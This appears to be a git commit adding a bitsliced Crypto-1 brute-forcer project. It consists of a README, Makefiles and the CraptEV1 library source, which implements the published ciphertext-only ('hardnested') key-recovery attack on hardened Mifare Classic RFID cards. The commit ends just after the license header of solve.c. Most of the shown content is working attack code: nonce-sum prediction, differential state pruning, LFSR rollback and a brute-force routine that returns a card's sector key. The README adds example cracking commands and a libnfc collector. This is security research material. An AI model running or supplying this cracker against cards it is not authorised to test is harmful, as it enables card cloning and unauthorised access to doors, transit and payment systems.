Move to crypto1_bs directory
This commit is contained in:
2
crypto1_bs/.gitignore
vendored
Normal file
2
crypto1_bs/.gitignore
vendored
Normal file
@ -0,0 +1,2 @@
|
||||
holycard_collect
|
||||
holycard_solve
|
26
crypto1_bs/Makefile
Executable file
26
crypto1_bs/Makefile
Executable file
@ -0,0 +1,26 @@
|
||||
# if -march=native does not work on your platform, you could try
|
||||
# -msse
|
||||
# -msse2
|
||||
# -mavx
|
||||
# or
|
||||
# -mavx2
|
||||
|
||||
CC = gcc
|
||||
|
||||
CFLAGS = -std=gnu99 -O3 -march=native
|
||||
LDFLAGS= #-Wl,--allow-multiple-definition
|
||||
|
||||
all: holycard_collect holycard_solve
|
||||
|
||||
CRAPTEV1 = craptev1-v1.1/craptev1.c -I craptev1-v1.1/
|
||||
CRAPTO1 = crapto1-v3.3/crapto1.c crapto1-v3.3/crypto1.c -I crapto1-v3.3/
|
||||
CRYPTO1_BS = crypto1_bs.c crypto1_bs_crack.c
|
||||
|
||||
holycard_collect:
|
||||
$(CC) $(CFLAGS) $@.c $(CRYPTO1_BS) $(CRAPTO1) ${CRAPTEV1} -o $@ -lpthread -lnfc -lm $(LDFLAGS)
|
||||
|
||||
holycard_solve:
|
||||
$(CC) $(CFLAGS) $@.c $(CRYPTO1_BS) $(CRAPTO1) ${CRAPTEV1} -o $@ -lpthread -lm $(LDFLAGS)
|
||||
|
||||
clean:
|
||||
rm -f solve.so holycard_collect holycard_solve
|
81
crypto1_bs/README.md
Normal file
81
crypto1_bs/README.md
Normal file
@ -0,0 +1,81 @@
|
||||
Bitsliced Crypto-1 brute-forcer
|
||||
===============================
|
||||
|
||||
A pure C(99) implementation of the [Crypto-1 cipher](https://en.wikipedia.org/wiki/Crypto-1) using the method of [bitslicing](https://en.wikipedia.org/wiki/Bit_slicing), which uses GNU vector extensions to be portable across SSE/AVX/AVX2 supporting architectures while offering the highest amount of possible parallelism.
|
||||
|
||||
|
||||
Background
|
||||
----------
|
||||
|
||||
I wrote this as a patch for [piwi's imlementation](https://github.com/pwpiwi/proxmark3/tree/hard_nested/) of the research documented in [Ciphertext-only cryptanalysis on hardened Mifare Classic cards](http://www.cs.ru.nl/~rverdult/Ciphertext-only_Cryptanalysis_on_Hardened_Mifare_Classic_Cards-CCS_2015.pdf) after reading (most of) the paper, while it was still under [active development](http://www.proxmark.org/forum/viewtopic.php?id=2120).
|
||||
|
||||
After my development of a somewhat naive brute-forcer, another implementation of the same attack surfaced, [CraptEV1](http://crapto1.netgarage.org/).
|
||||
With all of its clever tricks that code pushed me to improve my own, eventually reaching a significant (8-10x) speedup.
|
||||
Besides that, its publication as a library also inspired the included libnfc application that demonstrates the CraptEV1 attack code + my bitsliced cracker.
|
||||
|
||||
The proxmark3 patch, as well as the code for piwi's branch that it applies to, have since been merged into [Iceman1001's fork](https://github.com/iceman1001/proxmark3/) along with many other experimental improvements to the proxmark3 codebase.
|
||||
Much more work has been done in the project since my patch, so I would advise proxmark3 users to use that fork to test the code.
|
||||
My original patch is included for completeness as `pwpiwi_proxmark3_hard_nested.patch`.
|
||||
|
||||
Even later still, this code actually got merged into the upstream [Proxmark3 codebase](https://github.com/Proxmark/proxmark3)! More importantly, it was included as part of an entirely new variation on the attack by [@pwpiwi](https://github.com/pwpiwi/), which requires fewer nonces and achieves a better reduction of potential states, while also improving the brute-forcing phase, ending up as another order of magnitude faster in practice.
|
||||
This improved solution is also usable with a branch of [mfoc](https://github.com/vk496/mfoc/tree/hardnested) by [@vk496](https://github.com/vk496).
|
||||
|
||||
Tools
|
||||
-----
|
||||
|
||||
~~The following tools are only available for / tested on 64-bit Linux.~~
|
||||
Support for 32-bit and 64-bit machines was tested on various Intel/ARM based Linux platforms.
|
||||
OSX compatibility issues were resolved by [@unkernet](https://github.com/unkernet/).
|
||||
|
||||
If you want to use the following stand-alone binaries, you will need the original CraptEV1 / Crapto1 source packages.
|
||||
For convenience, and because redistribution of CraptEV1 is not allowed, I've added make targets `get_craptev1` and `get_crapto1` to fetch and extract these packages to the current working directory.
|
||||
I have included a conversion of the test file `0xcafec0de.txt` included in the CraptEV1 package to the binary format used by the `proxmark3/hard_nested` branch.
|
||||
|
||||
`solve_bs` is analogous to CraptEV1 `solve` and works on .txt files using the bitsliced crypto-1 cracker
|
||||
|
||||
$ ./solve_bs craptev1-v1.1/0xcafec0de.txt 0xcafec0de
|
||||
|
||||
`solve_piwi` uses CraptEV1 on .bin files as gathered by piwi's PM3 code
|
||||
|
||||
$ ./solve_piwi 0xcafec0de.bin
|
||||
|
||||
`solve_piwi_bs` does the same but uses the bitsliced cracker
|
||||
|
||||
$ ./solve_piwi_bs 0xcafec0de.bin
|
||||
|
||||
`libnfc_crypto1_crack` uses libnfc to demonstrate the CraptEV1 code using the bitsliced cracker
|
||||
|
||||
$ ./libnfc_crypto1_crack 000000000000 0 A 4 A
|
||||
|
||||
|
||||
Acknowledgements
|
||||
----------------
|
||||
|
||||
Special thanks to Carlo Meijer, Roel Verdult, piwi and bla.
|
||||
|
||||
|
||||
License
|
||||
-------
|
||||
|
||||
All the code in this repository is made available under the MIT license, except for the files `pwpiwi_proxmark3_hard_nested.patch` and `libnfc_crypto1_crack.c`, which are GPLv2 due to deriving from respectively Proxmark3 and MFOC.
|
||||
|
||||
Copyright (c) 2015-2016 Aram Verstegen
|
||||
|
||||
Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
of this software and associated documentation files (the "Software"), to deal
|
||||
in the Software without restriction, including without limitation the rights
|
||||
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||
copies of the Software, and to permit persons to whom the Software is
|
||||
furnished to do so, subject to the following conditions:
|
||||
|
||||
The above copyright notice and this permission notice shall be included in
|
||||
all copies or substantial portions of the Software.
|
||||
|
||||
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
|
||||
THE SOFTWARE.
|
||||
|
10000
crypto1_bs/craptev1-v1.1/0xcafec0de.txt
Normal file
10000
crypto1_bs/craptev1-v1.1/0xcafec0de.txt
Normal file
File diff suppressed because it is too large
Load Diff
2
crypto1_bs/craptev1-v1.1/Makefile
Normal file
2
crypto1_bs/craptev1-v1.1/Makefile
Normal file
@ -0,0 +1,2 @@
|
||||
all: solve.c craptev1.c craptev1.h
|
||||
gcc -O3 -mpopcnt solve.c craptev1.c -o solve
|
472
crypto1_bs/craptev1-v1.1/craptev1.c
Normal file
472
crypto1_bs/craptev1-v1.1/craptev1.c
Normal file
@ -0,0 +1,472 @@
|
||||
/**
|
||||
* CraptEV1
|
||||
* Copyright (c) 2015-2016 blapost@gmail.com
|
||||
*
|
||||
* This software is provided 'as-is', without any express or implied
|
||||
* warranty. In no event will the authors be held liable for any damages
|
||||
* arising from the use of this software.
|
||||
*
|
||||
* Permission is granted for non-commercial use only.
|
||||
*
|
||||
* No redistribution. No modifications.
|
||||
*/
|
||||
#include "craptev1.h"
|
||||
static uint8_t halfsum[2][1 << 20];
|
||||
static uint8_t filterflip[1 << 20];
|
||||
static uint8_t filterlut[1 << 20];
|
||||
static uint32_t hsum_off[2][0x89];
|
||||
static double prob[257];
|
||||
void __attribute__((constructor)) craptev1_init() {
|
||||
uint32_t i, j, s, t, p, q;
|
||||
uint32_t esum, osum;
|
||||
uint64_t ocnt[9] = {0}, ecnt[9] = {0};
|
||||
|
||||
if(**halfsum)
|
||||
return;
|
||||
|
||||
for(i = 0; i < 1 << 20; i++) {
|
||||
osum = esum = 0;
|
||||
for(j = 0; j < 1 << 4; j++) {
|
||||
s = i << 4 | j;
|
||||
t = filter(s) ^ filter(s >> 1) ^ filter(s >> 2) ^ filter(s >> 3);
|
||||
osum += t ^ filter(i);
|
||||
esum += t;
|
||||
}
|
||||
halfsum[0][i] = esum >> 1;
|
||||
halfsum[1][i] = osum >> 1;
|
||||
ecnt[esum >> 1]++;
|
||||
ocnt[osum >> 1]++;
|
||||
filterflip[i] = filter(i) ^ filter(i ^ 1);
|
||||
filterlut[i] = filter(i);
|
||||
}
|
||||
|
||||
for(p = 0; p < 9; ++p)
|
||||
for(q = 0; q < 9; ++q)
|
||||
prob[8 * (4 * p + 4 * q - p * q)] += ecnt[p] * ocnt[q];
|
||||
for(i = 0; i < 257; ++i)
|
||||
prob[i] /= 1ull << 40;
|
||||
|
||||
for(j = 0; j < 1 << 4; ++j)
|
||||
for(i = 0; i < 1 << 20; ++i) {
|
||||
hsum_off[0][halfsum[0][j << 16 | i >> 4] << 4 | halfsum[0][i]]++;
|
||||
hsum_off[1][halfsum[1][j << 16 | i >> 4] << 4 | halfsum[1][i]]++;
|
||||
}
|
||||
}
|
||||
#define filter(x) (filterlut[(x) & 0xfffff])
|
||||
#define LF_POLY (0x8708040029CE5C)
|
||||
#define ROR(x, n) ((x) >> (n) | (x) << (32 - (n)))
|
||||
#define DIVIDE(s, p) ROR((unsigned)(((int)(s - (p) * 32)) / (int)(4 - (p))), 3)
|
||||
#define FACTOR(s, p) ((s & 1) || ((p) == 4 ? s == 128 : DIVIDE(s, (p)) < 9))
|
||||
/** getsum0
|
||||
* Calculate the sum property at time zero
|
||||
*/
|
||||
uint32_t getsum0(uint64_t *nonce) {
|
||||
uint32_t unique[256] = {0};
|
||||
uint32_t i, numfound = 0 , sum = 0;
|
||||
|
||||
for(i = 0; nonce[i] != -1 && numfound < 256; ++i)
|
||||
if(!unique[0xff & nonce[i]]) {
|
||||
sum += parity(0xff & nonce[i]) ^ BIT(nonce[i], 32);
|
||||
unique[0xff & nonce[i]] = 1;
|
||||
numfound++;
|
||||
}
|
||||
|
||||
return numfound == 256 ? sum : -1;
|
||||
}
|
||||
/** eliminate
|
||||
* build initial sorted candidate list based on sumproperties
|
||||
*/
|
||||
uint32_t* eliminate(uint32_t sum0, uint32_t sum8, uint32_t isodd) {
|
||||
uint32_t y, yy, *set, p, r, *wrt[0x89] = {0}, *w, irr8 = sum8 >> 1 == 64;
|
||||
uint8_t *hsum = halfsum[isodd], i, irr0 = sum0 >> 1 == 64;
|
||||
set = w = malloc((sizeof(uint32_t) << 24) + 4);
|
||||
|
||||
for(p = 0; p != 4 && !irr0; p = (p + 1) * 2 % 11)
|
||||
for(r = 0; r != 4; r = (r + 1) * 2 % 11)
|
||||
if(FACTOR(sum0, p) && FACTOR(sum8, r))
|
||||
w = (wrt[p << 4 | r] = w) + hsum_off[isodd][p << 4 | r];
|
||||
for(r = 0; r != 4 && irr0; r = (r + 1) * 2 % 11)
|
||||
for(p = 0; p != 4; p = (p + 1) * 2 % 11)
|
||||
if(FACTOR(sum0, p) && FACTOR(sum8, r))
|
||||
w = (wrt[p << 4 | r] = w) + hsum_off[isodd][p << 4 | r];
|
||||
|
||||
for(p = 0; p != 4; p = (p + 1) * 2 % 11)
|
||||
if(FACTOR(sum0, p) && FACTOR(sum8, 4))
|
||||
w = (wrt[p << 4 | 4] = w) + hsum_off[isodd][p << 4 | 4];
|
||||
for(p = 0; p < 9; p = (p + 1) * 2 % 11)
|
||||
if(FACTOR(sum0, 4) && FACTOR(sum8, p))
|
||||
w = (wrt[64 | p] = w) + hsum_off[isodd][64 | p];
|
||||
|
||||
for(y = 0; y < 1 << 20; ++y)
|
||||
for(yy = 0; yy < 1 << 4; ++yy)
|
||||
if(wrt[i = (p = hsum[yy << 16 | y >> 4]) << 4 | (r = hsum[y])]) {
|
||||
*wrt[i] = (irr0 ? p == 4 : p) << 28 | (irr8 ? r == 4 : r) << 24;
|
||||
*wrt[i]++ |= yy << 20 | y;
|
||||
}
|
||||
|
||||
return *w = -1, set;
|
||||
}
|
||||
|
||||
/** differential
|
||||
* prune more states using filter flips and differential analysis
|
||||
*/
|
||||
uint32_t differential(uint32_t *list, uint32_t isodd, uint8_t byte,
|
||||
uint8_t bbyte, uint16_t bsum8, uint32_t flip) {
|
||||
uint32_t j, possible, k, invariant, i;
|
||||
uint32_t y, yprime, lsb, jdiv;
|
||||
uint32_t *read, *write, bit;
|
||||
uint8_t *hsum = halfsum[isodd];
|
||||
|
||||
if(!flip && (bsum8 & 1)) return 0;
|
||||
|
||||
for(i = 0; i < 8 && BIT(byte, i) == BIT(bbyte, i); ++i);
|
||||
k = (8 - i + !!isodd) >> 1;
|
||||
|
||||
for(write = read = list; *read != -1; ++read){
|
||||
y = *read;
|
||||
yprime = *read & ~((1 << k) - 1);
|
||||
|
||||
for(j = i, jdiv = k; j < 7 + !!isodd; ++j) {
|
||||
invariant = BIT(byte, j) ^ BIT(bbyte, j);
|
||||
invariant ^= BIT(y, 2 + jdiv) ^ BIT(yprime, 2 + jdiv);
|
||||
invariant ^= filter(y >> jdiv) ^ filter(yprime >> jdiv);
|
||||
|
||||
if((j & 1) != !!isodd && invariant != 0) break;
|
||||
j += (j & 1) != !!isodd;
|
||||
jdiv--;
|
||||
|
||||
bit = BIT(y, jdiv);
|
||||
bit ^= BIT(byte, j) ^ BIT(bbyte, j);
|
||||
bit ^= BIT(y, 3 + jdiv) ^ BIT(yprime, 3 + jdiv);
|
||||
bit ^= BIT(y, 4 + jdiv) ^ BIT(yprime, 4 + jdiv);
|
||||
|
||||
yprime |= bit << jdiv;
|
||||
}
|
||||
|
||||
for(lsb = possible = 0; lsb < 1 << jdiv; ++lsb){
|
||||
if(FACTOR(bsum8, hsum[0xfffff & (yprime | lsb)]))
|
||||
if((flip & 1) == 0 || filterflip[0xfffff & (yprime | lsb)])
|
||||
if((flip & 2) == 0 || filterflip[0xfffff & (yprime | lsb) >> 1])
|
||||
if((flip & 4) == 0 || filterflip[0xfffff & (yprime | lsb) >> 2])
|
||||
|
||||
if((flip & 16) == 0 || !filterflip[0xfffff & (yprime | lsb)])
|
||||
if((flip & 32) == 0 || !filterflip[0xfffff & (yprime | lsb) >> 1])
|
||||
if((flip & 64) == 0 || !filterflip[0xfffff & (yprime | lsb) >> 2])
|
||||
|
||||
possible = 1;
|
||||
}
|
||||
if(possible) *write++ = y;
|
||||
|
||||
}
|
||||
*write = -1;
|
||||
|
||||
return (uint32_t)(read - write);
|
||||
}
|
||||
/** binom
|
||||
* calculate the binomial coefficient
|
||||
*/
|
||||
static double binom(uint32_t n, uint32_t k) {
|
||||
double num = 1.0;
|
||||
uint32_t i, t = (n - k > k) ? n - k : k;
|
||||
|
||||
if(k > n)
|
||||
return 0;
|
||||
for(i = t + 1; i <= n; ++i)
|
||||
num *= i;
|
||||
for(i = 2; i <= n - t; ++i)
|
||||
num /= i;
|
||||
|
||||
return num;
|
||||
}
|
||||
/** predictsum
|
||||
* passable prediction logic based on hypergeometric distribution
|
||||
*/
|
||||
static uint32_t predictsum(uint64_t *nonces, uint8_t byte, uint32_t *conf) {
|
||||
uint32_t k, K, n, N = 256, bestK = 0, i;
|
||||
uint8_t seen[256] = {0}, nonceb1, nonceb2;
|
||||
double num, sum = 0.0, max = 0.0;
|
||||
|
||||
for(i = k = n = 0; nonces[i] != -1; ++i){
|
||||
nonceb1 = nonces[i];
|
||||
nonceb2 = nonces[i] >> 8;
|
||||
if(nonceb1 == byte && !seen[nonceb2]) {
|
||||
seen[nonceb2] = 1;
|
||||
++n;
|
||||
k += parity(nonceb2) ^ BIT(nonces[i], 40);
|
||||
}
|
||||
}
|
||||
|
||||
for(K = 0; K <= 256; K += 1) {
|
||||
num = binom(K, k) * (binom(N - K, n - k) / binom(N, n));
|
||||
sum += num * prob[K];
|
||||
max = (num > max) ? bestK = K, num : max;
|
||||
}
|
||||
|
||||
*conf = 100.0 * max * prob[bestK] / sum + 0.5;
|
||||
return bestK;
|
||||
}
|
||||
|
||||
|
||||
/** getpredictions
|
||||
* guess the sumproperty at time 8 for all possible first 8 bits
|
||||
*/
|
||||
uint32_t getpredictions(uint64_t *nonces, int tresh, uint32_t *pred) {
|
||||
uint32_t i, none = 1, conf, sum8;
|
||||
|
||||
for(i = 0; i < 256; ++i){
|
||||
sum8 = predictsum(nonces, i, &conf);
|
||||
none &= pred[i] = (conf >= tresh) ? sum8 | conf << 16 : 129;
|
||||
}
|
||||
|
||||
return !none;
|
||||
}
|
||||
/** bestb
|
||||
* poor heuristic to find reasonable base for differential analysis
|
||||
*/
|
||||
uint8_t bestb(uint32_t *pred) {
|
||||
uint32_t i, j, h, k;
|
||||
uint32_t max = 0;
|
||||
for(i = 0; i < 256; ++i) {
|
||||
if(pred[i] & 1) continue;
|
||||
|
||||
for(j = 0, h = i; j < 256; ++j) {
|
||||
if(i == j || (pred[j] & 1)) continue;
|
||||
for(k = 0; k < 8 && BIT(i, k) == BIT(j, k); ++k);
|
||||
h += k << 8;
|
||||
}
|
||||
max = (h > max) ? h : max;
|
||||
}
|
||||
return max;
|
||||
}
|
||||
/** findflips
|
||||
* Detect some filter flip conditions
|
||||
*/
|
||||
uint32_t findflips(uint64_t *nonces, uint32_t *flips) {
|
||||
uint32_t parities[256] = {0};
|
||||
uint32_t i, status = 0;
|
||||
|
||||
for(i = 0; nonces[i] != -1; ++i)
|
||||
parities[nonces[i] & 0xff] = BIT(nonces[i], 32);
|
||||
|
||||
for(i = 0; i < 0x100; ++i){
|
||||
flips[i] = 0;
|
||||
|
||||
flips[i] |= (parities[i] == parities[i ^ 0x80]) << 0;
|
||||
flips[i] |= (parities[i] == parities[i ^ 0x20]) << 1;
|
||||
flips[i] |= (parities[i] == parities[i ^ 0x08]) << 2;
|
||||
|
||||
flips[i] |= (parities[i] == parities[i ^ 0x40]) << 8;
|
||||
flips[i] |= (parities[i] == parities[i ^ 0x10]) << 9;
|
||||
flips[i] |= (parities[i] == parities[i ^ 0x04]) << 10;
|
||||
|
||||
status |= flips[i];
|
||||
}
|
||||
for(i = 0; i < 0x30; ++i) {
|
||||
flips[i] |= ((~flips[i] & 0x001) == 0x001) << 4;
|
||||
flips[i] |= ((~flips[i] & 0x101) == 0x101) << 12;
|
||||
flips[i] |= ((~flips[i] & 0x103) == 0x103) << 5;
|
||||
|
||||
flips[i] |= ((~flips[i] & 0x303) == 0x303) << 13;
|
||||
flips[i] |= ((~flips[i] & 0x307) == 0x307) << 6;
|
||||
flips[i] |= ((~flips[i] & 0x707) == 0x707) << 14;
|
||||
}
|
||||
for(i = 0; i < 0x100; ++i){
|
||||
if(status & 1 << 0) flips[i] &= ~0x6066;
|
||||
if(status & 1 << 1) flips[i] &= ~0x4044;
|
||||
if(status & 1 << 8) flips[i] &= ~0x6640;
|
||||
if(status & 1 << 9) flips[i] &= ~0x4400;
|
||||
if((status & 7) == 7) flips[i] &= ~0x400;
|
||||
}
|
||||
|
||||
return status;
|
||||
}
|
||||
static void __lfsr_rollback(uint64_t *s, uint32_t in) {
|
||||
uint32_t bit, i;
|
||||
uint64_t state = *s;
|
||||
|
||||
for(i = 0; i < 8; ++i) {
|
||||
bit = state & 1;
|
||||
state = state >> 32 | (state & 0xffffff) << 31;
|
||||
bit ^= parity64(LF_POLY & state);
|
||||
bit ^= in >> (7 - i);
|
||||
bit ^= filter(state);
|
||||
state |= (uint64_t)bit << 55;
|
||||
}
|
||||
*s = state;
|
||||
}
|
||||
static uint8_t inline paritycheck(uint64_t *s, uint32_t in) {
|
||||
uint32_t feedin, i;
|
||||
uint8_t ret = in >> 8;
|
||||
|
||||
for(i = 0; i < 8; ++i) {
|
||||
ret ^= feedin = filter(*s);
|
||||
feedin ^= parity64(LF_POLY & *s) ^ in >> i;
|
||||
|
||||
*s = *s << 32 | (uint32_t)(*s >> 31);
|
||||
*s &= ~1ull;
|
||||
*s |= feedin & 1;
|
||||
}
|
||||
return ret ^ filter(*s);
|
||||
}
|
||||
#define FOR_EACH_BYTE(X) (X) && (X) && (X) && (X)
|
||||
uint64_t brute(uint32_t **task) {
|
||||
uint32_t *oe = task[2], *p, i;
|
||||
uint64_t *e, *eb, *ee, savestate, state, o, key;
|
||||
|
||||
eb = ee = malloc((1 << 20) + sizeof(uint64_t) * (task[4] - task[3]));
|
||||
for(p = task[3]; p < task[4]; ++p) {
|
||||
*ee = (uint64_t)*p << 32;
|
||||
__lfsr_rollback(ee++, **task);
|
||||
}
|
||||
|
||||
for(; task[1] < oe; ++task[1]) {
|
||||
o = *task[1];
|
||||
__lfsr_rollback(&o, 0);
|
||||
|
||||
for(e = eb; e < ee; ++e) {
|
||||
state = savestate = o ^ *e;
|
||||
i = 0;
|
||||
p = task[0] + 10;
|
||||
while(FOR_EACH_BYTE(!paritycheck(&state, *p++))) {
|
||||
state = savestate;
|
||||
if(++i == 100) goto out;
|
||||
}
|
||||
}
|
||||
}
|
||||
free(eb);
|
||||
return -1;
|
||||
|
||||
out:
|
||||
free(eb);
|
||||
for(key = 0, i = 23; i < 24; --i)
|
||||
key = key << 2 | BIT(state, i ^ 3) << 1 | BIT(state, 32 | (i ^ 3));
|
||||
return key;
|
||||
}
|
||||
/** sumsplit
|
||||
* Split sorted list of candidates into ranges. Based on msb.
|
||||
*/
|
||||
void sumsplit(uint32_t *list, uint32_t **ranges, uint32_t sum0, uint32_t sum8) {
|
||||
uint32_t *last, p, i;
|
||||
|
||||
ranges[*list >> 24] = list;
|
||||
for(last = list; *last != -1; ++last)
|
||||
if(!ranges[*last >> 24]) {
|
||||
ranges[*last >> 24] = last;
|
||||
ranges[256 | *(last - 1) >> 24] = last;
|
||||
}
|
||||
ranges[256 | *(last - 1) >> 24] = last;
|
||||
|
||||
for(i = 0, p = 1; i < 16 && sum0 >> 1 == 64; i += p ^= 1)
|
||||
ranges[p << 8 | 0x20 | i] = ranges[p << 8 | 0x10 | i];
|
||||
for(i = 0; i < 32 && sum8 >> 1 == 64; ++i)
|
||||
ranges[i << 4 | 2] = ranges[i << 4 | 1];
|
||||
for(i = 0; i < 32 && (sum8 & 1); ++i)
|
||||
ranges[i << 4 | 3] = ranges[i << 4];
|
||||
}
|
||||
/** mkspace
|
||||
* split candidate lists into list of lists by matching halfsums
|
||||
*/
|
||||
uint32_t **mkspace(uint32_t *o, uint32_t *e, uint32_t sum0, uint32_t sum8) {
|
||||
uint32_t *ohead[512] = {0}, **otail = ohead + 256, p, q, r, s;
|
||||
uint32_t *ehead[512] = {0}, **etail = ehead + 256, **jobs, **j;
|
||||
|
||||
sumsplit(o, ohead, sum0, sum8);
|
||||
sumsplit(e, ehead, sum0, sum8);
|
||||
|
||||
j = 1024 + (jobs = malloc(sizeof(uint32_t*) << 14));
|
||||
*j++ = o;
|
||||
*j++ = e;
|
||||
|
||||
for(p = 0; p != 4; p = (p + 1) * 2 % 11) {
|
||||
for(r = 0; r != 4; r = (r + 1) * 2 % 11) {
|
||||
q = (sum0 >> 1 == 64) ? !(p & 1) : DIVIDE(sum0, p);
|
||||
s = (sum8 >> 1 == 64) ? !(r & 1) : DIVIDE(sum8, r);
|
||||
if(q < 9 && s < 9 && ohead[p << 4 | r] && ehead[q << 4 | s]) {
|
||||
*j++ = (uint32_t*)jobs;
|
||||
*j++ = ohead[p << 4 | r];
|
||||
*j++ = otail[p << 4 | r];
|
||||
*j++ = ehead[q << 4 | s];
|
||||
*j++ = etail[q << 4 | s];
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return *j = 0, jobs;
|
||||
}
|
||||
/** craptev1_get_space
|
||||
* Derive reduced search space from list of nested nonces.
|
||||
* - returns a zero terminated list of partitions (5 pointers each)
|
||||
* add 5 to the return value to get a pointer to the second partition.
|
||||
* - uid is stored for use by search functions, it can be omitted.
|
||||
*/
|
||||
uint32_t** craptev1_get_space(uint64_t *nonces, uint32_t tresh, uint32_t uid) {
|
||||
uint32_t sum0, sum8, pred[256], haspred, flips[256];
|
||||
uint32_t *olist, *elist, i, **space, byte, *pre, b;
|
||||
uint64_t t;
|
||||
|
||||
sum0 = getsum0(nonces);
|
||||
if(sum0 == -1) return 0;
|
||||
|
||||
haspred = getpredictions(nonces, tresh, pred);
|
||||
byte = haspred ? bestb(pred): 0xa5;
|
||||
sum8 = pred[byte] & 0xffff;
|
||||
findflips(nonces, flips);
|
||||
|
||||
olist = eliminate(sum0, sum8, 1);
|
||||
elist = eliminate(sum0, sum8, 0);
|
||||
|
||||
for(i = 0; i < 256; ++i) {
|
||||
differential(olist, 1, byte, i, pred[i], flips[i] & 255);
|
||||
differential(elist, 0, byte, i, pred[i], flips[i] >> 8);
|
||||
}
|
||||
|
||||
space = mkspace(olist, elist, sum0, sum8);
|
||||
|
||||
pre = (uint32_t*)space;
|
||||
pre[0] = byte ^ uid >> 24;
|
||||
pre[1] = uid;
|
||||
for(i = 0, pre += 10; i < 400;)
|
||||
for(b = 24, t = *nonces++; b < 32; b -= 8, t >>= 8, ++i)
|
||||
pre[i] = parity((t ^ t >> 32) & 255) << 8 | ((t ^ uid >> b) & 255);
|
||||
|
||||
return space + 1026;
|
||||
}
|
||||
/** craptev1_sizeof_space
|
||||
* Calculate the size of the search space
|
||||
*/
|
||||
uint64_t craptev1_sizeof_space(uint32_t **space) {
|
||||
uint64_t i, c = 0, o, e;
|
||||
|
||||
for(i = 0; space[i]; i += 5) {
|
||||
o = space[i + 2] - space[i + 1];
|
||||
e = space[i + 4] - space[i + 3];
|
||||
c += o * e;
|
||||
}
|
||||
|
||||
return c;
|
||||
}
|
||||
/** craptev1_destroy_space
|
||||
* Free all memory associated with a search space.
|
||||
*/
|
||||
void craptev1_destroy_space(uint32_t **space) {
|
||||
free(*--space);
|
||||
free(*--space);
|
||||
free(space - 1024);
|
||||
}
|
||||
/** craptev1_search_partition
|
||||
* Search one partition of the search space. Return key if found.
|
||||
*/
|
||||
uint64_t craptev1_search_partition(uint32_t **partition) {
|
||||
return brute(partition);
|
||||
}
|
||||
/** craptev1_search_space
|
||||
* Search entire search space.Return key if found.
|
||||
*/
|
||||
uint64_t craptev1_search_space(uint32_t **space) {
|
||||
uint64_t i, key = -1;
|
||||
|
||||
for(i = 0; space[i] && key == -1; i += 5)
|
||||
key = brute(space + i);
|
||||
|
||||
return key;
|
||||
}
|
49
crypto1_bs/craptev1-v1.1/craptev1.h
Normal file
49
crypto1_bs/craptev1-v1.1/craptev1.h
Normal file
@ -0,0 +1,49 @@
|
||||
/**
|
||||
* CraptEV1
|
||||
* Copyright (c) 2015-2016 blapost@gmail.com
|
||||
*
|
||||
* This software is provided 'as-is', without any express or implied
|
||||
* warranty. In no event will the authors be held liable for any damages
|
||||
* arising from the use of this software.
|
||||
*
|
||||
* Permission is granted for non-commercial use only.
|
||||
*
|
||||
* No redistribution. No modifications.
|
||||
*/
|
||||
#ifndef CRAPTEV1_INCLUDED
|
||||
#define CRAPTEV1_INCLUDED
|
||||
|
||||
#include <stdlib.h>
|
||||
#include <inttypes.h>
|
||||
|
||||
#ifdef __cplusplus
|
||||
extern "C" {
|
||||
#endif
|
||||
|
||||
void craptev1_init();
|
||||
uint32_t** craptev1_get_space(uint64_t *nonces, uint32_t tresh, uint32_t uid);
|
||||
uint64_t craptev1_sizeof_space(uint32_t **space);
|
||||
void craptev1_destroy_space(uint32_t **space);
|
||||
uint64_t craptev1_search_partition(uint32_t **partition);
|
||||
uint64_t craptev1_search_space(uint32_t **space);
|
||||
|
||||
|
||||
#define parity(n) (__builtin_popcountl(n) & 1)
|
||||
#define parity64(n) __builtin_popcountll(n)
|
||||
#define BIT(x, n) ((x) >> (n) & 1)
|
||||
static inline int filter(uint32_t const x) {
|
||||
uint32_t f;
|
||||
|
||||
f = 0xf22c0 >> (x & 0xf) & 16;
|
||||
f |= 0x6c9c0 >> (x >> 4 & 0xf) & 8;
|
||||
f |= 0x3c8b0 >> (x >> 8 & 0xf) & 4;
|
||||
f |= 0x1e458 >> (x >> 12 & 0xf) & 2;
|
||||
f |= 0x0d938 >> (x >> 16 & 0xf) & 1;
|
||||
return BIT(0xEC57E80A, f);
|
||||
}
|
||||
|
||||
#ifdef __cplusplus
|
||||
}
|
||||
#endif
|
||||
#endif
|
||||
|
19
crypto1_bs/craptev1-v1.1/readme
Normal file
19
crypto1_bs/craptev1-v1.1/readme
Normal file
@ -0,0 +1,19 @@
|
||||
CRAPTEV1
|
||||
--------
|
||||
|
||||
Partial implementation of attacks detailed in:
|
||||
Ciphertext-only Cryptanalysis on Hardened Mifare Classic Cards
|
||||
URL: http://www.cs.ru.nl/~rverdult/Ciphertext-only_Cryptanalysis_on_Hardened_Mifare_Classic_Cards-CCS_2015.pdf
|
||||
Carlo Meijer(The Kerckhoffs Institute), Roel Verdult (Radboud University)
|
||||
carlo@youcontent.nl, rverdult@cs.ru.nl
|
||||
|
||||
Authors of the paper are not authors of the code.
|
||||
|
||||
contents
|
||||
--------
|
||||
craptev1.c : main implementation library
|
||||
craptev1.h : defines interface, and parity functions
|
||||
solve.c : a demo linux x86_64 client
|
||||
|
||||
bla,
|
||||
blapost@gmail.com
|
122
crypto1_bs/craptev1-v1.1/solve.c
Normal file
122
crypto1_bs/craptev1-v1.1/solve.c
Normal file
@ -0,0 +1,122 @@
|
||||
/**
|
||||
* CraptEV1
|
||||
* Copyright (c) 2015-2016 blapost@gmail.com
|
||||
*
|
||||
* This software is provided 'as-is', without any express or implied
|
||||
* warranty. In no event will the authors be held liable for any damages
|
||||
* arising from the use of this software.
|
||||
*
|
||||
* Permission is granted for non-commercial use only.
|
||||
*
|
||||
* No redistribution. No modifications.
|
||||
*/
|
||||
